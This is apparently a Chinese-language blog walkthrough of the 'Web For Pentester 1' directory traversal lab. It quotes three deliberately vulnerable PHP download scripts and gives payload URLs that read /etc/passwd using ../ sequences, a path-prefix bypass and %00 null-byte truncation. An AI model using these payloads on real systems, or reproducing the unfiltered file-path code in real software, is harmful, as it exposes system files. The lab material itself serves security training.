Web For Pentester1 -Directory traversal

Example 1

源码:

<?php

$UploadDir = ‘/var/www/files/‘;

if (!(isset($_GET[‘file‘])))
die();


$file = $_GET[‘file‘];

$path = $UploadDir . $file;

if (!is_file($path))
die();

header(‘Cache-Control: must-revalidate, post-check=0, pre-check=0‘);
header(‘Cache-Control: public‘);
header(‘Content-Disposition: inline; filename="‘ . basename($path) . ‘";‘);
header(‘Content-Transfer-Encoding: binary‘);
header(‘Content-Length: ‘ . filesize($path));

$handle = fopen($path, ‘rb‘);

do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);

fclose($handle);
exit();


?>

解释:默认以二进制显示头像hack.png,  $handle = fopen($path, ‘rb‘)这里 path 变量没有进行任何过滤,导致可以通过../../../的形式造成目录穿越

payload:

http://10.10.202.152/dirtrav/example1.php?file=../../../etc/passwd

 

Example 2

源码:

<?php


if (!(isset($_GET[‘file‘])))
die();


$file = $_GET[‘file‘];

if (!(strstr($file,"/var/www/files/")))
die();

if (!is_file($file))
die();

header(‘Cache-Control: must-revalidate, post-check=0, pre-check=0‘);
header(‘Cache-Control: public‘);
header(‘Content-Disposition: inline; filename="‘ . basename($file) . ‘";‘);
header(‘Content-Transfer-Encoding: binary‘);
header(‘Content-Length: ‘ . filesize($file));

$handle = fopen($file, ‘rb‘);

do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);

fclose($handle);
exit();


?>

解释:这里检测了 file 参数必须含有 /var/www/files/,实际上并不影响我们使用 ../../进行目录穿越:

payload:

http://10.10.202.152/dirtrav/example2.php?file=/var/www/files/../../../etc/passwd

 

Example 3

源码:

<?php
$UploadDir = ‘/var/www/files/‘;

if (!(isset($_GET[‘file‘])))
die();


$file = $_GET[‘file‘];

$path = $UploadDir . $file.".png";
// Simulate null-byte issue that used to be in filesystem related functions in PHP
$path = preg_replace(‘/\x00.*/‘,"",$path);

if (!is_file($path))
die();

header(‘Cache-Control: must-revalidate, post-check=0, pre-check=0‘);
header(‘Cache-Control: public‘);
header(‘Content-Disposition: inline; filename="‘ . basename($path) . ‘";‘);
header(‘Content-Transfer-Encoding: binary‘);
header(‘Content-Length: ‘ . filesize($path));

$handle = fopen($path, ‘rb‘);

do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);

fclose($handle);
exit();


?>

解释:

$path = $UploadDir . $file.".png"; 限制了读取的文件名为后缀是Png的类型,但是可以通过 00 截断来 Bypass PHP <= 5.3.4 版本,且魔术引号处于关闭状态的时候可以 00 截断成功。

$path = preg_replace(‘/\x00.*/‘,"",$path); 正则表达式,x00.* 后面的都替换为空,刚好,%00.png 就可以全部替换掉了

payload:

http://10.10.202.152/dirtrav/example3.php?file=../../../../../etc/passwd%00

OVER!

Web For Pentester1 -Directory traversal

上一篇:22.1.23学习记录


下一篇:CSS定位属性